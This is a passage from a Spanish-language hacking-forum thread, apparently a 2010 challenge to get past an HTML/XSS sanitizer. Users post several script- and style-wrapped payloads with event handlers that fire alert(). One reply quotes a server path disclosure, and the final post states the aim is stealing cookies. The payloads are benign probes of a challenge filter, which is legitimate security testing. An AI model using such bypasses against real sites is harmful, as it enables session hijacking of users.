[CYH] Bypass de filtros de XSS :)

Iniciado por sirdarckcat, 8 Abril 2010, 08:47 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2 3
Acciones del Usuario

SeC

#10
15 Abril 2010, 00:08 AM Ultima modificación: 15 Abril 2010, 14:06 PM por SeC
Parece que aún vale, asique :P

Código [Seleccionar]

<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>

otro,

Código [Seleccionar]
<script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a><
Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.

~ Yoya ~

#11
15 Abril 2010, 01:56 AM Ultima modificación: 16 Abril 2010, 00:05 AM por ~ Yoya ~
Código [Seleccionar]
<Script>><p onMouseDown=alert(0) >aa </p> t=
<script language="javascript">><p onMouseDown=alert(0) >aa </p> t=
<Style>><p onMouseOut=alert(0) >aa </p> t=

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

WHK

#12
15 Abril 2010, 06:03 AM
jajaja que chafa el filtro

jdc

#13
15 Abril 2010, 06:20 AM
File disclosoure no vale?

CitarWarning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7

netscape

#15
15 Abril 2010, 22:55 PM Ultima modificación: 16 Abril 2010, 23:33 PM por netscape
Aquí estan los mios:

Código [Seleccionar]
<script>>"/><a><<img src=lol.gif onerror=alert(1)> >

Código [Seleccionar]
<script>>"/><a><<img src=lol.gif onerror=window.alert(1)> >

Código [Seleccionar]
'>><marquee><h1>XSS</h1></marquee>

Código [Seleccionar]
<script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>

Código [Seleccionar]
<script>><p lang="es"</p> onmouseup=alert('XSS')>>

Código [Seleccionar]
<script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>

Saludos!!

cgvwzq

#16
15 Abril 2010, 23:11 PM
Pero si son todos el mismo...xD

Además, el último de netscape no es ni siquiera un bypass. ¬¬

A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan.
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ

Twitter | Blog

Castg!

#17
16 Abril 2010, 00:16 AM
El último de netscape qué tiene de inyección de javascript?

jdc

#18
16 Abril 2010, 00:31 AM
Castg no necesitas inyectar javascript para que sea xss

Castg!

#19
16 Abril 2010, 02:56 AM
¬¬ pero este desafio es asi :D jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.

la idea, es poder inyectar el codigo javascript para quitar una cookie.
Imprimir
Ir Arriba Páginas 1 2 3
Acciones del Usuario